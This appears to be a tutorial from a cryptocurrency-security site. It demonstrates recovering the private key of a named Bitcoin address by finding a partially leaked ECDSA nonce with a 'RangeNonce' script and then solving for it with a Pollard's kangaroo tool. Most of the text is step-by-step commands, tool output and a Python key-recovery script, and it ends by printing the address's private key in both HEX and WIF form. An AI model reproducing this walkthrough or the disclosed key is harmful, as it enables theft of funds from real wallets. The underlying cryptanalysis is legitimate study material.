Pollard’s Kangaroo find solutions to the discrete logarithm secp256k1 PRIVATE KEY + NONCES in a known range
In this article, we will look at the fastest algorithm for ECDLP from the field of computational number theory, Pollard’s kangaroo is also called Pollard’s lambda algorithm.
Pollard’s kangaroo method computes discrete logarithms in arbitrary cyclic groups. It is applied if the discrete logarithm is known to lie in a certain range, say [ a , b ]
, and then has an expected time to execute the bulk operation.
- uses very little memory
- can be parallelized with linear acceleration
- memory requirements can be effectively tracked
All this makes the kangaroo method the most powerful method for solving the discrete logarithm problem.
In settings ECDSA
, sub-exponential time algorithms, such as the index calculus method, are not used, and the best known solution method underlying them today DLP
is the Pollard kangaroo method. We will try not to burden you with various theoretical aspects. Let’s move on to the experimental part.
As we know in the Bitcoin blockchain, the sender of BTC coins always reveals his public key .
For the Pollard kangaroo method, it is enough to know the public key or signature R
value (the value R
is also a kind of public key from Nonces
because it is a coordinate point x
on the elliptic curve plane secp256k1
It remains only to define the range
or rangeNONCES
It happens that some devices that create signatures ECDSA
in the Bitcoin blockchain can partially disclose bytes of information about the value "K" (NONCES)
We believe that this is a potential threat of losing BTC coins and strongly recommend that everyone always update the software and use only verified devices.
In the recent past, we did cryptanalysis on the Bitcoin blockchain and found several such transactions.
In the transactions of this Bitcoin Address 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE , there was a partial disclosure of bytes of information about the value "K" (NONCES)
As we know from our last article
habr.com/en/post/671932/Let’s find this transaction and use Pollard’s kangaroo method to recover the private key
Earlier we recorded a video instruction : «TERMINAL in Google Colab create all the conveniences for working in GITHUB»
Open Google Colab in Terminal [TerminalGoogleColab]
To search for RawTX, we will use the repository «01BlockchainGoogleDrive»
Run Bash script: getrawtx.shgit clone https://github.com/demining/CryptoDeepTools.git
cd CryptoDeepTools/01BlockchainGoogleDrive/
chmod +x getrawtx.sh
./getrawtx.sh 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE
All contents of the Bitcoin Address 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE transaction were saved to the file: RawTX.json
Open the file: RawTX.json
and find this transaction [строка №10]
Let’s use the command export
and save this line №10
from RawTX.json
separately to RawTX.txt
export LINE=10 ; sed -n "${LINE}p" RawTX.json > RawTX.txt
cat RawTX.txt
Let ‘s find out, open the Decode Raw Bitcoin Hexadecimal TransactionTxID
website and insert our As a result, we get TxIDRawTX
Open the link TxID:
Now we find out the partial disclosure of bytes of information about the value "K" (NONCES)
To do this, we will use the script «RangeNonce»
is a script to find the range of the secret key
Let’s choose the version for the distribution kit GNU/Linux
. Google Colab
provides UBUNTU 18.04
Upload all files to Google Colab
Let’s allow permissions for the script and run the script «RangeNonce»
chmod +x RangeNonce
cat Result.txt
So our secret key is in the range :
K = 070239c013e8f40c8c2a0e608ae15a6b00000000000000000000000000000000
K = 070239c013e8f40c8c2a0e608ae15a6bffffffffffffffffffffffffffffffff
Pay attention to the initial
digits and lettersHEX
of the format, the value of the signatureZ
matches the range of the secret key , that is, the value"K" (NONCES)
As we said above, for the Pollard kangaroo method, it is enough to know the public key or signature R
value (the value R
is also a kind of public key from Nonces
because it is a coordinate point x
on the elliptic curve plane secp256k1
Signature value R
in our case:
R = 83fe1c06236449b69a7bee5be422c067d02c4ce3f4fa3756bd92c632f971de06
The script RangeNonce
added the prefix 02
we needed by creating a compressed public key
K_PUBKEY = 0283fe1c06236449b69a7bee5be422c067d02c4ce3f4fa3756bd92c632f971de06
- secret key range
- compressed public key
Let’s use the source code to build the Pollard’s Kangaroo program from the French developer Jean-Luc PONS
Please note that you can assemble on your own
increase the speed of calculations.
We will do a normal assembly for the CPU
cd /
cd content/CryptoDeepTools/06KangarooJeanLucPons/
sudo apt-get update
sudo apt-get install g++ -y
sudo apt-get install libgmp3-dev libmpfr-dev -y
After all the package installations, we will build by running a simple command:
Проверим версию:
./kangaroo -v
To demonstrate the performance «Kangaroo v2.2»
for let’s CPU
raise the range and save everything to a file: rangepubkey.txt
Очистим терминал командой:
Run «Kangaroo v2.2»
the result will be automatically saved to a file: savenonce.txt
./kangaroo -ws -w save.work -wi 30 -o savenonce.txt rangepubkey.txt
Result in file: savenonce.txt
Let ‘s open the file: savenonce.txt
Key# 0 [1S]Pub: 0x0283FE1C06236449B69A7BEE5BE422C067D02C4CE3F4FA3756BD92C632F971DE06 Priv: 0x70239C013E8F40C8C2A0E608AE15A6B23D4A09295BE678B21A5F1DCEAE1F634
K = 070239c013e8f40c8c2a0e608ae15a6b00000000000000000000000000000000 # RangeNonce K = 070239C013E8F40C8C2A0E608AE15A6B23D4A09295BE678B21A5F1DCEAE1F634 # NONCES K = 070239c013e8f40c8c2a0e608ae15a6bffffffffffffffffffffffffffffffff # RangeNonce
Now knowing the value, "K" (NONCES)
we will restore the private key to the Bitcoin Address: 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE
Let’s go back to the beginning, as we remember, the script «RangeNonce»
revealed to us information about the range value "K" (NONCES)
, as well as information SIGNATURES
R = 83fe1c06236449b69a7bee5be422c067d02c4ce3f4fa3756bd92c632f971de06
S = 7405249d2aa9184b688f5307006fddc3bd4a7eb89294e3be3438636384d64ce7
Z = 070239c013e8f40c8c2a0e608ae15a6b1bb4b8fbcab3cff151a6e4e8e05e10b7
Get the private key using the formula in Python script : calculate.py
def h(n): return hex(n).replace("0x","")
def extended_gcd(aa, bb): lastremainder, remainder = abs(aa), abs(bb) x, lastx, y, lasty = 0, 1, 1, 0 while remainder: lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder) x, lastx = lastx - quotientx, x y, lasty = lasty - quotienty, y return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m): g, x, y = extended_gcd(a, m) if g != 1: raise ValueError return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141 R = 0x83fe1c06236449b69a7bee5be422c067d02c4ce3f4fa3756bd92c632f971de06 S = 0x7405249d2aa9184b688f5307006fddc3bd4a7eb89294e3be3438636384d64ce7 Z = 0x070239c013e8f40c8c2a0e608ae15a6b1bb4b8fbcab3cff151a6e4e8e05e10b7 K = 0x070239C013E8F40C8C2A0E608AE15A6B23D4A09295BE678B21A5F1DCEAE1F634
print (h((((S * K) - Z) * modinv(R,N)) % N))
PRIVKEY=23d4a09295be678b21a5f1dceae1f634a69c1b41775f680ebf8165266471401bwget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/02BreakECDSAcryptography/calculate.py
python3 calculate.py
ADDR: 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE
WIF: 5J64pq77XjeacCezwmAr2V1s7snvvJkuAz8sENxw7xCkikceV6e
HEX: 23d4a09295be678b21a5f1dceae1f634a69c1b41775f680ebf8165266471401b
This video was created for the CRYPTO DEEP TECH portal to ensure the financial security of data and cryptography on elliptic curves secp256k1
against weak signatures ECDSA
in cryptocurrency BITCOIN
Telegram: https://t.me/cryptodeeptech
Video: https://youtu.be/UGUJyxOhBBQ
Source: https://cryptodeeptech.ru/kangaroo
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